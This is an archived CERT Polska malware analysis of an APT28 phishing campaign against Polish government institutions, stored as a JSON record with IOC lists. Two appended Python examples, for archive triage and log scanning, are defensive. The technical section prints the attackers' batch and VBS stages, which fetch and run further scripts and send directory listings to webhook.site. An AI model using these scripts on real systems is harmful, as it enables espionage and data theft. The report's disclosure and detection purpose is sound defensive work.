{
	"id": "8cca853a-4822-4a90-b6e1-08a027921c34",
	"created_at": "2026-04-06T00:11:36.375776Z",
	"updated_at": "2026-04-10T03:37:00.032862Z",
	"deleted_at": null,
	"sha1_hash": "6382f4eb8aa4679fb0e4c6aa78db773594a3f073",
	"title": "APT28 campaign targeting Polish government institutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 185149,
	"plain_text": "APT28 campaign targeting Polish government institutions\r\nArchived: 2026-04-05 18:31:23 UTC\r\nThis week, the CERT Polska (CSIRT NASK) and CSIRT MON teams observed a large-scale malware campaign targeting Polish government institutions. Based on technical indicators and similarity to attacks described in the past (e.g. against Ukrainian entities), the campaign can be associated with the APT28 activity set, which is attributed to the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).\r\nTechnical analysis\r\nThe campaign sent e-mails with content intended to arouse the recipient's interest and persuade them to click on the link. An example of the message used is presented below:\r\nEmail's content translated to English:\r\nSubject: I solved your problem\r\nHello Paweł!\r\nI did a little research and found this mysterious Ukrainian woman.\r\nNow she is in Warsaw.\r\nShe runs a rather unusual company that sells used underwear.\r\nShe also has clients from senior authorities in Poland and Ukraine.\r\nAll information on this subject is available at this link - ALINA-BOKLAN\r\nThe link points to an address in the domain run.mocky.io, a free service used by developers to create and test mock APIs. In this case it was used only to redirect to another site, webhook.site, which lets its user log every request to a generated address and configure the responses to them. This site is also popular among people working in IT. Using free, widely used services instead of attacker-controlled domains makes the links far less likely to be flagged as malicious and at the same time lowers the cost of the operation. This is a trend we see across many APT groups.\r\nhttps://cert.pl/en/posts/2024/05/apt28-campaign/\r\nPage 1 of 7\n\nFinally, a ZIP archive whose name suggests that it contains photos is downloaded from webhook.site. 
The name starts with IMG- and ends with a random number (e.g. IMG-238279780.zip). When the archive is opened with the default Windows settings (known file extensions hidden, hidden files not shown), the victim is presented with the following view:\r\nThe archive actually contains three files:\r\na Windows calculator under a changed name, e.g. IMG-238279780.jpg.exe, which poses as a photo and invites the victim to click it,\r\na .bat script (hidden file),\r\na malicious library named WindowsCodecs.dll (hidden file).\r\nIf the victim runs IMG-238279780.jpg.exe, which is a harmless calculator, at startup it tries to load the library WindowsCodecs.dll and, because the directory the executable was started from is searched before the system directories, it loads the copy the attackers placed next to it. This technique is known as DLL Side-Loading. The only role of the DLL is to run the included BAT script:\r\n@echo off\r\nif not DEFINED IS_MINIMIZED (\r\n set IS_MINIMIZED=1\r\n start \"\" /min \"%~dpnx0\" %*\r\n exit\r\n)\r\nstart msedge data:text/html;base64,PHRpdGxlPklNRy02MzQ5MjMzNjk2OC5qcGc8L3RpdGxlPjxpZnJhbWUgc3JjPSJodHRwczovL3dlY\r\ntimeout 15 \u003e nul\r\nmove %userprofile%\\downloads\\IMG-63492336968.jpg %programdata%\\IMG-63492336968.cmd \u003e nul\r\ntype nul \u003e %userprofile%\\downloads\\IMG-63492336968.jpg\r\ncall %programdata%\\IMG-63492336968.cmd\r\ndel /q /f /a %0\r\nexit\r\nThe BAT script first relaunches itself minimized (the IS_MINIMIZED guard) so that no console window stays visible, then opens Microsoft Edge on a base64-encoded data: URL; the part shown decodes to an HTML page titled IMG-63492336968.jpg with an iframe pointing at an https:// address, which is how the next batch script is downloaded (again from webhook.site). At the same time the browser displays photos of a real woman in a swimsuit along with links to her real social media accounts. This is intended to make the attackers' narrative credible and to lull the recipient's vigilance. 
Edge saves the downloaded file in the Downloads folder with the .jpg extension; the script then moves it to %programdata% with the extension changed from .jpg to .cmd, leaves an empty file under the original name, executes the renamed script and deletes itself.\r\n@echo off \u0026 (\r\n echo On Error Resume Next\r\n echo CreateObject(\"WScript.shell\").Run \"^\"\"%%programdata%%\\\\dee016bf-21a2-45dd-86b4-6099747794c4.bat^\"^^\"\",\r\n echo Set oFso = CreateObject(\"Scripting.FileSystemObject\") : oFso.DeleteFile Wscript.ScriptFullName, True\r\n) \u003e \"%programdata%\\dee016bf-21a2-45dd-86b4-6099747794c4.vbs\" \u0026 echo del %%0 ^\u0026 for /l %%%%n in () do (\r\n chcp 65001 ^\u0026 timeout 300 ^\u0026 taskkill /im msedge.exe /f ^\u0026 timeout 5 ^\u0026 del /q /f \"%%userprofile%%\\Downloads\r\n) \u003e \"%programdata%\\dee016bf-21a2-45dd-86b4-6099747794c4.bat\" \u0026 (\r\n echo ^\u003c!DOCTYPE html^\u003e^\u003chtml^\u003e^\u003cbody^\u003e^\u003cscript^\u003evar xhr = new XMLHttpRequest^(^);var text = String.raw^`)\r\n) \u003e \"%programdata%\\uaxhexd.tab\" \u0026 (\r\n echo ^`;xhr.open^(^'PUT^', ^'https://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4^'^);xhr.setRequestHea\r\n) \u003e \"%programdata%\\ohqddqtqc.tsv\" \u0026 start \"\" \"%programdata%\\dee016bf-21a2-45dd-86b4-6099747794c4.vbs\" \u0026 del %0\r\nThis script constitutes the main loop of the program. It first writes a small VBS launcher that starts the dropped .bat file and then deletes itself; in the unbounded loop for /l %n in () the .bat file waits 5 minutes (timeout 300), kills Edge and, as before, downloads another script using Microsoft Edge and a reference to webhook.site and executes it. The .tab and .tsv files written alongside are fragments of an HTML page whose script issues a PUT request to the same webhook.site address; the next stage assembles them. This time the file is downloaded with the .css extension, then renamed to .cmd and launched.\r\nThe final script we received only collects information about the computer on which it was launched (IP address and a list of files in selected folders) and sends it to the C2 server. 
Probably the computers of victims selected by the attackers receive a different set of final-stage scripts.\r\n@echo off\r\nchcp 65001\r\ntaskkill /im msedge.exe /f\r\n(dir \"%userprofile%\\..\" \u0026 dir \"%userprofile%\\Desktop\" \u0026 dir \"%userprofile%\\Downloads\" \u0026 dir \"%userprofile%\\Docum\r\ncopy \"%programdata%\\*.tab\" + \"%programdata%\\*.diff\" + \"%programdata%\\*.tsv\" \"%programdata%\\nydgflyhuv.html\"\r\n(echo %programdata%) \u003e \"%programdata%\\gjvrexfiac\"\r\nset /p gjvrexfiac=\u003c\"%programdata%\\gjvrexfiac\"\r\ntimeout 5\r\nstart \"\" msedge --headless=new --disable-gpu \"file:///%gjvrexfiac%/nydgflyhuv.html\"\r\ntimeout 30\r\ntaskkill /im msedge.exe /f\r\ndel /q /f \"%userprofile%\\Downloads\\*.css\"\r\ndel /q /f \"%programdata%\\gjvrexfiac\"\r\ndel /q /f \"%programdata%\\*.diff\"\r\ndel /q /f \"%programdata%\\nydgflyhuv.html\"\r\nThe collector kills Edge, lists the user's profile, Desktop, Downloads and Documents folders (the dir line and its output redirection are truncated in the source; judging by the copy command that follows, the listing ends up in a .diff file), wraps that data in the earlier .tab and .tsv HTML fragments to produce nydgflyhuv.html, opens the page in headless Edge so that its script sends the data to webhook.site, and then deletes the downloaded .css script, the temporary files and the HTML page.\r\nThe entire attack flow is shown in the diagram below. Its course is identical to that of the HEADLACE malware publicly described in the past.\r\nRecommendations\r\nThe primary purpose of this publication is to disrupt hostile activity and to enable detection and analysis of the described activity. The CERT Polska team recommends that network administrators check whether the organization's employees have been targeted by this attack.\r\nWe recommend reviewing recent connections to the domains webhook.site and run.mocky.io, as well as their presence in received emails. 
We also emphasize that these are sites commonly used by programmers, and traffic to them does not by itself mean infection.\r\nIf your organization does not use the above-mentioned services, we recommend that you consider blocking those domains on edge devices.\r\nRegardless of whether you use those sites, we also recommend filtering emails for links to webhook.site and run.mocky.io, because legitimate use of them in email content is very rare.\r\nSites of this type have already been used many times in campaigns attributed to APT groups.\r\nIf you suspect a malware infection, we recommend disconnecting the device from the network (both wired and wireless) and contacting the appropriate CSIRT team immediately.\r\nIOCs\r\nURLs (every run.mocky.io entry uses the same mock endpoint and differs only in the q= parameter, which names the webhook.site address it redirects to):\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=2d07e34c-3dd3-45e8-865c-3888a65ab885\r\nhttps://webhook.site/2d07e34c-3dd3-45e8-865c-3888a65ab885\r\nhttps://webhook.site/4ba464d9-0675-4a7a-9966-8f84e93290ba\r\nhttps://webhook.site/577b82c3-7249-44e9-9353-5eab106fead6\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=127df518-52be-46c5-bbb2-0479f4b9693b\r\nhttps://webhook.site/127df518-52be-46c5-bbb2-0479f4b9693b\r\nhttps://webhook.site/0ef0dcf7-f258-4d02-b274-cbf62a2000cf\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=c1112bb3-0e6e-4ba4-abe7-fb31388b47ad\r\nhttps://webhook.site/c1112bb3-0e6e-4ba4-abe7-fb31388b47ad\r\nhttps://webhook.site/3f396db1-2016-4b69-9ec3-ffc417d5f3aa\r\nhttps://webhook.site/66ea3bbc-29dc-4ece-b804-71c6ec7b77b6\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=efb79108-a2b5-4cba-844d-6352bb8fad8c\r\nhttps://webhook.site/efb79108-a2b5-4cba-844d-6352bb8fad8c\r\nhttps://webhook.site/9c87649c-220d-425d-8331-ffc8d9b94a38\r\nhttps://webhook.site/c618ea32-2923-4c12-8151-8d0002b56af0\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=f97bcee0-0d91-4503-a30c-027f1b34820f\r\nhttps://webhook.site/f97bcee0-0d91-4503-a30c-027f1b34820f\r\nhttps://webhook.site/9a9cdaf8-120c-4de9-b17a-d6d8e2796a3b\r\nhttps://webhook.site/e13d23aa-b6f8-4491-9adc-71f7f8c438df\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5e4c7949-30a2-4477-9e9b-e8828fc76a1b\r\nhttps://webhook.site/5e4c7949-30a2-4477-9e9b-e8828fc76a1b\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5100fcc0-f6be-4b09-8c58-5a8a6706ec4f\r\nhttps://webhook.site/5100fcc0-f6be-4b09-8c58-5a8a6706ec4f\r\nhttps://webhook.site/7674f06b-e435-4470-a594-6d59578c552d\r\nhttps://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=508da0df-7ec9-420e-b1fe-958fbbe699d1\r\nhttps://webhook.site/508da0df-7ec9-420e-b1fe-958fbbe699d1\r\nhttps://webhook.site/bec23763-b8d9-4191-99ba-04a4a163b4de\r\nhttps://webhook.site/90fea98f-fbdb-4847-be03-409d02a43caf\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=bc349b93-b047-42f8-a421-d45e3ec94dc5\r\nhttps://webhook.site/bc349b93-b047-42f8-a421-d45e3ec94dc5\r\nhttps://webhook.site/5a8758c6-5702-4fea-9d5e-4fbdb6dd795f\r\nhttps://webhook.site/b10bd697-1a9f-4ec7-aa2f-1fa84ad916a1\r\nhttps://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=1658772a-4de8-4368-a604-980c90b0a1ed\r\nhttps://webhook.site/1658772a-4de8-4368-a604-980c90b0a1ed\r\nhttps://webhook.site/4fe5885c-f2f6-4905-8bc7-aef1a046a134\r\nhttps://webhook.site/0d2dc90e-2d5e-49f8-8249-d7ab955c387a\r\nSHA256 hashes and filenames (note that the final-stage .css script has the same hash in every sample, while the ZIP, DLL and .bat differ per sample):\r\n2bd9591bea6b1f4128e4819e3888b45b193d5a2722672b839ad7ae120bf9af3d IMG-1030873974629655576.zip\r\n52b8bfbd9ef8ecfd54e71c74a7131cb7b3cc61ea01bc6ce17cbe7aef14acc948 WindowsCodecs.dll\r\n4001498463dc8f8010ef1cc803b67ac434ff26d67d132933a187697aa2e88ef1 bcpcn.bat\r\n158d49cce44968ddd028b1ef5ebc2a5183a31f05707f9dc699f0c47741be84db IMG-1030873974629655576.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 kpqsklcrdsonoknaote.css\r\n7c6689f591ce2ccd6713df62d5135820f94bdbf2e035ab70e6b3c6746865a898 IMG-7214532.zip\r\nc968f9dd1f16a435901d2b93a028a0ae2508e943c8f480935a529826deb3dbeb WindowsCodecs.dll\r\n34cabc0ff2f216830ffe217e8f8d0fa4b7d3a167576745aba48b7e62f546207b zdesdyf.bat\r\ne1069c8677d64226f7881e8504ed7a13f79f43f143842ea6c1c8b2cc680ed6c2 IMG-238279780.zip\r\n43ff178e428373512b83f85db32f364fc19c9a4ac7317835bd5089915b8727b5 WindowsCodecs.dll\r\nca700d44db08ad2ebd52278a3b303f8c13e44847a507fb317ea5dfb6cc924a76 hjpxswjdkayzwfphx.bat\r\nbab7e81395e1e9ee1680c3bb702c44b1b13ee5e67fa893d765284ae168de8369 IMG-238279780.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 vngradn.css\r\n38ae06833528db02cb3a315d96ad2a664b732b5620675028a8c5e059e820514f IMG-810629002957075004.zip\r\nee433ddd5988ab7325b92378c6d3cb736ddb7f1bad75b939e8c931f417660129 WindowsCodecs.dll\r\n9ddf5561562a62961a6fcac1dc49633cb79f5d3c8cc9b95fd9f87e7be70d2d35 yvrlqpkgngppjp.bat\r\ndfd1f3229f903887f2474f361a26273dc63a6221883e86c5eea2dec9521dc081 IMG-810629002957075004.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 ovhupm.css\r\n949b0bd52a4ed47bc4a342e5a29bff2bcdb0169d2fbf0f052509b65229e19b6e IMG-368912.zip\r\n642315d3091a3dfba6c0ed06f119fc40d21f3d84574b53e045baf8910e1fb38c WindowsCodecs.dll\r\nfb42a4e0f2dd293fd6e7acb8d67d67698a0ae7685bc5462685acf4c2f73d0b44 udkozfnsljmbpjs.bat\r\n07e539373177801e3fc5427bf691c0315a23b527d39e756daad6a9fc48e846bc IMG-368912.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 wrkybdizscvb.css\r\n5d2675572e092ba9aece8c8d0b9404b3adbd27db1312cd659ba561b86301fe73 IMG-451458326.zip\r\nf348a0349fdec136c3ac9eaee9b8761da6bd33df82056e4dd792192731675b00 WindowsCodecs.dll\r\n351f10d7df282afed4558d765aa5018af0711fa4f37fa7eb82716313f4848a2f illgvjrfyevoqxk.bat\r\n85f10d3df079b4db3a83ae3c4620c58a8362df2be449f8ce830d087ab41c7a52 IMG-451458326.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 mzmtfylpywlyurkcd.css\r\n745cfce3e0242d0d5f6765b1f74608e9086d7793b45dbd1747f2d2778dec6587 IMG-0601181.zip\r\n598a8b918d0d2908a756475aee1e9ffaa57b110d8519014a075668b8b1182990 WindowsCodecs.dll\r\nef67f20ff9184cab46408b27eaf12a5941c9f130be49f1c6ac421b546dac2bac hzjtajjklr.bat\r\n96766dfbf6c661ee3e9f750696803824a04e58402c66f208835a7acebfab1cfc IMG-0601181.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 daukbpnawvkfcjcfzu.css\r\n4f0f9a2076b0fd14124bed08f5fc939bada528e7a8163912a4ad1ec7687029a3 IMG-89848928.zip\r\nae4e94c5027998f4ce17343e50b935f448e099a89266f9564bd53a069da2ca9a WindowsCodecs.dll\r\nd714fff643d53fdd56cf9dcb3bd265e1920c4b5f34a4668b584a0619703d8a3e jxfgibtfxiewsdvmeg.bat\r\nb3e60909036c4110eb7e3d8c0b1db5be5c164fcc32056885e4f1afe561341afd IMG-89848928.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 cvywrkrhhfzza.css\r\n5883842c87ca6b59236257e15db983cc88d4948cf0d649455f8f393899673fcc IMG-3907894910429.zip\r\n0873a19d278a7a8e8cff2dc2e7edbfddc650d8ea961162a6eb3cb3ea14665983 WindowsCodecs.dll\r\ne826dc4f5c16a1802517881f32f26061a4cbc508c3f7944540a209217078aa11 bmpxjphdzwommblflx.bat\r\n750948489ed5b92750dc254c47b02eb595c6ffcefded6f9d14c3482a96a6e793 IMG-3907894910429.jpg\r\n939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364 qseybqanfkus.css\r\nSource: https://cert.pl/en/posts/2024/05/apt28-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cert.pl/en/posts/2024/05/apt28-campaign/"
	],
	"report_names": [
		"apt28-campaign"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28",
				"ATK5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"GRAPHITE",
				"Group 74",
				"PawnStorm",
				"STRONTIUM",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"TA422",
				"TG-4127",
				"Tsar Team",
				"UAC-0001"
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434296,
	"ts_updated_at": 1775792220,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6382f4eb8aa4679fb0e4c6aa78db773594a3f073.pdf",
		"text": "https://archive.orkl.eu/6382f4eb8aa4679fb0e4c6aa78db773594a3f073.txt",
		"img": "https://archive.orkl.eu/6382f4eb8aa4679fb0e4c6aa78db773594a3f073.jpg"
	}
}
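
Added example, not part of the CERT Polska report or of the ORKL record above: a Python triage check for the lure archive described in the Technical analysis section (a visible IMG-<number>.jpg.exe that is really a renamed calculator, plus a hidden .bat and a hidden WindowsCodecs.dll that the calculator side-loads). The archive it inspects is constructed in memory to mirror that layout; the "MZ" stubs are not real executables, and the extension lists, attribute handling and function names are the example's own assumptions, not anything the report specifies.

```python
import io
import re
import zipfile

# MS-DOS "hidden" attribute. For entries created on Windows the low byte of a
# ZIP entry's external_attr carries the DOS attribute bits (assumption of this
# example: the lure was built on Windows, so the hidden flag survives in the ZIP).
FILE_ATTRIBUTE_HIDDEN = 0x02
# Decoy document/image extension immediately followed by an executable one,
# e.g. IMG-238279780.jpg.exe (the report's example name).
DOUBLE_EXT = re.compile(r"\.(jpe?g|png|gif|pdf|docx?)\.(exe|scr|com|pif)$", re.IGNORECASE)
# Library name side-loaded by the renamed calculator in this campaign (from the report).
SIDELOAD_DLLS = {"windowscodecs.dll"}
SCRIPT_EXTS = (".bat", ".cmd", ".vbs", ".js")
LURE_NAME = re.compile(r"^IMG-\d+\.zip$", re.IGNORECASE)


def entry_is_hidden(info: zipfile.ZipInfo) -> bool:
    return bool(info.external_attr & FILE_ATTRIBUTE_HIDDEN)


def triage_archive(archive_name: str, data: bytes) -> dict:
    """Return the lure traits found in a ZIP archive and an overall verdict."""
    found = {
        "lure_filename": bool(LURE_NAME.match(archive_name)),
        "double_extension_pe": [],
        "hidden_scripts": [],
        "hidden_sideload_dll": [],
    }
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = info.filename.rsplit("/", 1)[-1]
            hidden = entry_is_hidden(info)
            with zf.open(info) as fh:
                magic = fh.read(2)  # PE images start with "MZ"
            if DOUBLE_EXT.search(base) and magic == b"MZ":
                found["double_extension_pe"].append(base)
            if hidden and base.lower().endswith(SCRIPT_EXTS):
                found["hidden_scripts"].append(base)
            if hidden and base.lower() in SIDELOAD_DLLS:
                found["hidden_sideload_dll"].append(base)
    traits = sum(bool(found[k]) for k in ("double_extension_pe", "hidden_scripts", "hidden_sideload_dll"))
    if traits == 3:
        found["verdict"] = "matches HEADLACE-style lure"
    elif traits:
        found["verdict"] = "suspicious"
    else:
        found["verdict"] = "no lure traits"
    return found


def build_sample_archive(lure: bool = True) -> tuple:
    """Constructed sample, not a real malware sample.

    lure=True mirrors the layout from the report: a visible .jpg.exe plus a
    hidden WindowsCodecs.dll and a hidden .bat. lure=False builds a plain
    archive of two JPEG stubs as a control.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if lure:
            zf.writestr("IMG-238279780.jpg.exe", b"MZ" + b"\x00" * 62)  # fake PE header only
            for name, body in (("WindowsCodecs.dll", b"MZ" + b"\x00" * 62),
                               ("hjpxswjdkayzwfphx.bat", b"@echo off\r\n")):
                zi = zipfile.ZipInfo(name)
                zi.external_attr = FILE_ATTRIBUTE_HIDDEN
                zf.writestr(zi, body)
        else:
            for name in ("holiday1.jpg", "holiday2.jpg"):
                zf.writestr(name, b"\xff\xd8\xff\xe0" + b"\x00" * 16)
    return ("IMG-238279780.zip" if lure else "holiday.zip"), buf.getvalue()


if __name__ == "__main__":
    for is_lure in (True, False):
        name, data = build_sample_archive(is_lure)
        print(name, triage_archive(name, data))
```

The three traits are scored independently because each is weak on its own (plenty of legitimate archives contain a hidden file, and a double extension without an MZ header is just an odd name); only the combination reproduces the layout the report describes. A `.jpg.exe` with no hidden companions still yields "suspicious" and deserves a look.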
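
Added example, not the report's code: a Python scanner for proxy logs or mail bodies that applies the Recommendations section. A bare webhook.site or run.mocky.io hit is reported as low confidence, since the report stresses these are legitimate developer services; it is escalated only when the address matches a published IOC identifier or the run.mocky.io mock endpoint that every IOC URL shares, or when the link appears in an email, where the report says legitimate use is very rare. The IOC subset is copied from the report's IOC list (a real deployment would load the whole list); the log lines are constructed, and the severity labels and function names are the example's own assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Subset of the URL IOCs published in the report.
IOC_URLS = {
    "https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=2d07e34c-3dd3-45e8-865c-3888a65ab885",
    "https://webhook.site/2d07e34c-3dd3-45e8-865c-3888a65ab885",
    "https://webhook.site/4ba464d9-0675-4a7a-9966-8f84e93290ba",
    "https://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4",
}
# Every run.mocky.io IOC uses this mock endpoint; only the q= parameter (the
# webhook.site target) varies, so a hit on the path alone is high confidence.
MOCKY_REDIRECTOR = "/v3/87f277a5-a081-4976-8e12-351b6c02a903"
IOC_WEBHOOK_IDS = {urlsplit(u).path.strip("/") for u in IOC_URLS
                   if urlsplit(u).hostname == "webhook.site"}
WATCHED_HOSTS = ("webhook.site", "run.mocky.io")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def classify_url(url: str, context: str = "proxy"):
    """Return (severity, reason) for a URL, or None if its host is not watched.

    context is "proxy" for network logs and "email" for links in mail bodies.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host not in WATCHED_HOSTS:
        return None
    if host == "webhook.site":
        token = parts.path.strip("/").split("/")[0]
        if token in IOC_WEBHOOK_IDS:
            return "high", "webhook.site address listed in the IOCs"
    else:  # run.mocky.io
        q = parse_qs(parts.query).get("q", [""])[0]
        if parts.path == MOCKY_REDIRECTOR or q in IOC_WEBHOOK_IDS:
            return "high", "campaign redirector endpoint on run.mocky.io"
    if context == "email":
        return "medium", f"{host} link in an email body; legitimate use in mail is rare"
    return "low", f"{host} is a legitimate developer service; check who made the request"


def scan_text(text: str, context: str = "proxy") -> list:
    """Extract URLs from log lines or a mail body and classify the watched ones.

    Returns (line_number, url, severity, reason) tuples.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for url in URL_RE.findall(line):
            verdict = classify_url(url, context)
            if verdict:
                hits.append((lineno, url, verdict[0], verdict[1]))
    return hits


# Constructed proxy log lines (not from the report). Lines 1-2 reproduce the
# redirect chain with published IOCs; lines 3-4 are benign developer traffic.
SAMPLE_PROXY_LOG = """\
2024-05-08T09:12:01Z 10.20.30.40 GET https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=2d07e34c-3dd3-45e8-865c-3888a65ab885 302
2024-05-08T09:12:02Z 10.20.30.40 GET https://webhook.site/2d07e34c-3dd3-45e8-865c-3888a65ab885 200
2024-05-08T09:13:15Z 10.20.30.41 GET https://run.mocky.io/v3/11111111-2222-4333-8444-555555555555 200
2024-05-08T09:14:00Z 10.20.30.42 PUT https://webhook.site/99999999-8888-4777-8666-555555555555 200
2024-05-08T09:15:00Z 10.20.30.43 GET https://www.example.org/index.html 200
"""

if __name__ == "__main__":
    for hit in scan_text(SAMPLE_PROXY_LOG):
        print(hit)
```

Running the scanner over a mail gateway's extracted links with `context="email"` implements the report's last recommendation directly: any webhook.site or run.mocky.io link in a message body is at least medium, while the same hosts in proxy logs stay low until an IOC or the shared mocky endpoint is matched.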